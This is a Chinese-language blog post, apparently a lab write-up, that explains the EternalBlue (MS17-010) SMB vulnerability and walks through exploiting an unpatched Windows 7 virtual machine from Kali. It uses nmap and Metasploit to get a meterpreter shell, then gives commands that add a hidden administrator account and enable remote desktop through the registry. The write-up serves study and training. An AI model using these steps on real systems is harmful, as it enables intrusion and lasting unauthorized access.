<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>第一篇文章 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]}});
    </script>
    <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-AMS_CHTML' async></script>
  
  
<link rel="stylesheet" href="/css/style.css">

  
  <!-- load your font here -->
  <script src="https://use.typekit.net/rtv1yrx.js"></script>
  <script>try{Typekit.load({ async: true });}catch(e){}</script>
  <!-- end to load your font. -->

  <style type="text/css">
    

    /* load setting */
    #head-avator-image{
      box-shadow: 0px 0px 0px 290px rgba(83, 207, 220, 0.7);
    }
    #head-title-context a{
      color: #4d4d4d;
      font-family: Artegra Sans Alt;
    }
    #head-bio-context h3{
      color: #0061b5;
      font-family: PT Serif;
    }
    #head-avator-image div{
      background: url( /avator.jpg );
      background-position-x: -31px;
      background-position-y: 0px;
    }
    #banner{
      background: url(/background/blur-cars-dew-125510.jpg);

      -webkit-filter: blur(2px) grayscale(20%);
      filter: blur(2px) grayscale(20%);

      -webkit-background-size: cover;
      -moz-background-size: cover;
      background-size: cover;
      background-repeat: no-repeat;
      z-index: -2;
      width:100%;
      height:100%;
      background-size: calc(100% + 50px);
    }
    #bannermask{
      background: #ffffff;
      opacity: 0;
    }
    #footer-background-mask{
      background: url(/background/blur-cars-dew-125510.jpg);
      background-position: bottom;
      -webkit-background-size: cover;
      -moz-background-size: cover;
      background-size: cover;
      background-repeat: no-repeat;
    }
    body{
      background: #f2f2f2;
    }
    #body-mask{
      background: ;
    }
    .archive-year-wrap a {
      background: #f2f2f2;
    }
    #footer {
      color: #8a8a8a;
      background: #151719;
    }
    .article-entry{
      font-family: source-han-serif-tc;
      font-size: 19px;
      color: #151717;
    }
    .index-post-title h1, .archive-post-title h1{
      font-family: source-han-serif-tc;
    }

    .article-entry a:hover{
      color: #29bcd0;
    }

    .img-desc, .def-font, #footer, #head-navigation a{
      font-family: Helvetica Neue, Helvetica, Microsoft JhengHei , Arial, sans-serif;
    }
    
    .pn-section{
      color: #151719;
      font-family: source-han-serif-tc; /* apply article text font */
    }

    .pn-section:hover{
      background: #151719;
      color: white;
    }
  </style>
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  <div id="body-mask"></div>
  <div id="container">
      <header id="header">
    <nav id="head-navigation">
        
            <a class="item" href="/">Home</a>
        
            <a class="item" href="/archives">Archives</a>
        
    </nav>
    <dir class="head-container-set" id="bannermask"></dir>
    <div class="head-container-set" id="banner"></div>
    <div id="head-title">
        <div id="head-avator-image">
            <div class="avator_image_set"></div>
        </div>
        <div id="head-title-context"><a href="/">Modern Siberia</a></div>
        <div id="head-bio-context"><h3>Do my best so I can&#39;t blame my self for anything.</h3></div>
    </div>

</header>
      <div class="outer">
        <section id="main"><article id="post-第一篇文章" class="article" itemscope itemprop="blogPost">
    <div id="" class="index-article-content">
        

        

        
            <div class="index-post-title">
                
                    
                        <h1 itemprop="name">
                            第一篇文章
                        </h1>
                    
                
            </header>
        

        <div class="author-info">
            <p>
                
                2025/1/24
            </p>
        </div>
        <div class="content-tag-list">
            Tags:
            
        </div>

        <hr class="content-split-line content-split-range" />

        

        <div class="article-entry">
            <p><strong>注明：技术仅作学习交流，并无传播恶意！</strong></p>
<h1 id="永恒之蓝漏洞ms17-010的简介"><a href="#永恒之蓝漏洞ms17-010的简介" class="headerlink" title="永恒之蓝漏洞ms17_010的简介"></a>永恒之蓝漏洞ms17_010的简介</h1><h2 id="1-什么是永恒之蓝"><a href="#1-什么是永恒之蓝" class="headerlink" title="1.什么是永恒之蓝"></a>1.什么是永恒之蓝</h2><p>  永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。</p>
<h2 id="2-永恒之蓝原理"><a href="#2-永恒之蓝原理" class="headerlink" title="2.永恒之蓝原理"></a>2.永恒之蓝原理</h2><p>永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。</p>
<h2 id="3-关于SMB协议"><a href="#3-关于SMB协议" class="headerlink" title="3.关于SMB协议"></a>3.关于SMB协议</h2><p>SMB（全称是Server Message Block）是一个协议服务器信息块，它是一种客户机&#x2F;服务器、请求&#x2F;响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP&#x2F;IP协议之上，SMB使用TCP139端口和TCP445端口。</p>
<h2 id="5-攻击方式"><a href="#5-攻击方式" class="headerlink" title="5.攻击方式"></a>5.攻击方式</h2><p>恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。<br>本次黑客使用的是Petya勒索病毒的变种Petwarp，攻击时仍然使用了永恒之蓝勒索漏洞，并会获取系统用户名与密码进行内网传播。<br>本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术，使得病毒可以在短时间内呈爆发态势。同时，该病毒与普通勒索病毒不同，其不会对电脑中的每个文件都进行加密，而是通过加密硬盘驱动器主文件表(MFT)，使主引导记录(MBR)不可操作，通过占用物理磁盘上的文件名，大小和位置的信息来限制对完整系统的访问，从而让电脑无法启动，相较普通勒索病毒对系统更具破坏性。</p>
<h1 id="实验复现"><a href="#实验复现" class="headerlink" title="实验复现"></a>实验复现</h1><h2 id="1-设备准备"><a href="#1-设备准备" class="headerlink" title="1.设备准备"></a>1.设备准备</h2><p>1.Linux kali虚拟机<br>2.Windows7虚拟机（注意需要下载不含补丁的版本）</p>
<h2 id="2-实验步骤"><a href="#2-实验步骤" class="headerlink" title="2.实验步骤"></a>2.实验步骤</h2><h3 id="（1）确认两台虚拟机IP地址"><a href="#（1）确认两台虚拟机IP地址" class="headerlink" title="（1）确认两台虚拟机IP地址"></a>（1）确认两台虚拟机IP地址</h3><p>Windows7：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig</span><br></pre></td></tr></table></figure>

<p><img src="https://i-blog.csdnimg.cn/direct/b47ec2901e4e4285a7e5bd0e9eb05294.png" alt="在这里插入图片描述"><br>得到靶机IP地址<br>Linux kali：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig</span><br></pre></td></tr></table></figure>
<p><img src="https://i-blog.csdnimg.cn/direct/e458215101fc4721814b6e94fbf79e65.png" alt="在这里插入图片描述"><br>得到攻击机IP</p>
<h3 id="（2）关闭靶机的防火墙，确保两台虚拟机连得上"><a href="#（2）关闭靶机的防火墙，确保两台虚拟机连得上" class="headerlink" title="（2）关闭靶机的防火墙，确保两台虚拟机连得上"></a>（2）关闭靶机的防火墙，确保两台虚拟机连得上</h3><p>防火墙在控制面板关闭<br><img src="https://i-blog.csdnimg.cn/direct/bad0c153ec1f4eafbffbf02339f6e6ae.png" alt="在这里插入图片描述"><br>两台虚拟机互相ping一下<br><img src="https://i-blog.csdnimg.cn/direct/85f9f01e6df741b0b3ca7f29f322a5ea.png" alt="在这里插入图片描述"><img src="https://i-blog.csdnimg.cn/direct/c249b94e644f4a3abe46a47c56ed7e6b.png#pic_center" alt="在这里插入图片描述">两台虚拟机能互相ping通</p>
<h3 id="（3）对靶机进行扫描"><a href="#（3）对靶机进行扫描" class="headerlink" title="（3）对靶机进行扫描"></a>（3）对靶机进行扫描</h3><p>使用nmap工具</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T4 -A -v 192.168.133.130</span><br></pre></td></tr></table></figure>
<p><img src="https://i-blog.csdnimg.cn/direct/0205cf4e9752464eacccbceabf791818.png#pic_center" alt="在这里插入图片描述">扫描发现靶机445端口开放，这里就需要利用445端口进行攻击</p>
<h3 id="（4）调用msfconsole进行攻击"><a href="#（4）调用msfconsole进行攻击" class="headerlink" title="（4）调用msfconsole进行攻击"></a>（4）调用msfconsole进行攻击</h3><p>输入指令进入msfconsole模块</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure>
<p><img src="https://i-blog.csdnimg.cn/direct/985c6b6864304577aa1c2d5f8b736f98.png" alt="在这里插入图片描述">在其中搜索ms17_010（这是永恒之蓝漏洞的编号）<br><img src="https://i-blog.csdnimg.cn/direct/0f031252d9cf4e9b8482c3a5ecda0944.png#pic_center" alt="在这里插入图片描述">其中#1是攻击模块，#24是扫描模块，先选择扫描模块对靶机进行扫描探测，监测是否存在永恒之蓝漏洞利用点</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use 0</span><br></pre></td></tr></table></figure>
<p>在输入show options 查看需要我们填写的内容，发现只需要填RHOST<br><img src="https://i-blog.csdnimg.cn/direct/6a3f4129338247969634485f925890bd.png" alt="在这里插入图片描述"><br>RHOST是靶机的IP，LHOST是攻击机的IP，RPORT是监听端口，也就是在永恒之蓝中的445端口<br>这里填写好RHOST </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> RHOST 192.168.133.130</span><br></pre></td></tr></table></figure>
<p>接着使用run运行<br><img src="https://i-blog.csdnimg.cn/direct/c6d2197d543a4d9099103afc162f09f5.png" alt="在这里插入图片描述">这里提示很可能存在ms17_010，说明我们可以利用这个漏洞。<br>接着用back指令回退，切换为#0攻击模块，因为参数都一样，所以run运行<br><img src="https://i-blog.csdnimg.cn/direct/49a9a84f424440e3900ca6cc32cbc0e0.png#pic_center" alt="在这里插入图片描述">当出现meterpreter时就成功了<br>Meterpreter 是 Metasploit 的一个扩展模块，可以调用 Metasploit 的一些功能，<br>对目标系统进行更深入的渗透，如进入cmd、获取屏幕、上传&#x2F;下载文件、创建持久后门等<br>输入shell获取当前环境下的控制台<br><img src="https://i-blog.csdnimg.cn/direct/fa0128ba783b44daa9042c4ca62863cc.png" alt="在这里插入图片描述"><br>接着在靶机上新建一个用户，并提升为管理员</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user 用户名 密码 /add</span><br><span class="line">net localgroup administrators 用户名 /add</span><br></pre></td></tr></table></figure>
<p><img src="https://i-blog.csdnimg.cn/direct/826c9dc396b94ef597a8f4bd7f5eef2e.png#pic_center" alt="在这里插入图片描述">接着查看一下本地用户有哪些，看到我们新创的用户了<br><img src="https://i-blog.csdnimg.cn/direct/5fe4891dea90470ebb7681779ff306b7.png" alt="在这里插入图片描述">接下来就是开启远程桌面<br>尝试了一下发现3389端口没有开启<br><img src="https://i-blog.csdnimg.cn/direct/86f68a003c464eedac7b9468bea78b21.png#pic_center" alt="在这里插入图片描述">先要开启靶机的3389端口<br>使用指令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal<span class="string">&quot; &quot;</span>Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f </span><br></pre></td></tr></table></figure>

<blockquote>
<p>REG ADD：这是用于添加新项或修改现有项的命令。<br>HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server：</p>
<p>HKLM：代表 “HKEY_LOCAL_MACHINE”，这是 Windows 注册表中的一个根键，存储了计算机的全局设置。<br>SYSTEM\CurrentControlSet\Control\Terminal<br>Server：这是注册表中的一个路径，指向与终端服务相关的设置。 &#x2F;v fDenyTSConnections：</p>
<p>&#x2F;v：指定要添加或修改的值的名称。<br>fDenyTSConnections：这是一个值名称，用于控制远程桌面连接的设置。具体来说，它指定是否允许远程桌面连接。 &#x2F;t<br>REG_DWORD：</p>
<p>&#x2F;t：指定值的数据类型。 REG_DWORD：表示这个值的数据类型是一个双字（DWORD），通常用于存储整数值。 &#x2F;d 00000000：</p>
<p>&#x2F;d：指定要设置的值的数据。 00000000：这是要设置的值，表示允许远程桌面连接。具体来说，0（或<br>00000000）表示不拒绝远程桌面连接。 &#x2F;f：</p>
<p>&#x2F;f：表示强制执行，不会询问确认。如果没有这个选项，系统可能会提示用户确认修改操作。</p>
</blockquote>
<p>接着新打开一个root，输入指令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rdesktop 靶机IP</span><br></pre></td></tr></table></figure>
<p>就可以登录靶机了<br><img src="https://i-blog.csdnimg.cn/direct/f6079da1ac0d40f48e61373373cc011b.png" alt="在这里插入图片描述"></p>

        </div>

        
        </div>

        <hr class="content-split-line" />
  </div>
</article>



<footer>
    <div id="content-nav">
        <!-- Next Post and Prev Post -->
        
            <div class="next-prev-post-section">
                
                    <a href="#"></a>
                
                
                    <a href="/2025/02/24/hello-world/" id="next-page" class="pn-section">
                        <h2 id="next-page-title">Next:</h2>
                        <p class="styled-border">
                            
                            Hello World
                            →
                        </p>
                    </a>
                
            </div>
            
    </div>
</footer>


</section>
      </div>
  </div>

  <div id="footer-background-mask">
    <div id="footer-background"></div>
  </div>

  <footer id="footer">
  <div class="outer footer-box">
    <div id="footer-info" class="inner">
      &copy; 2025 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
  

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>




  <script src="/js/effect.js"></script>
  
</body>
</html>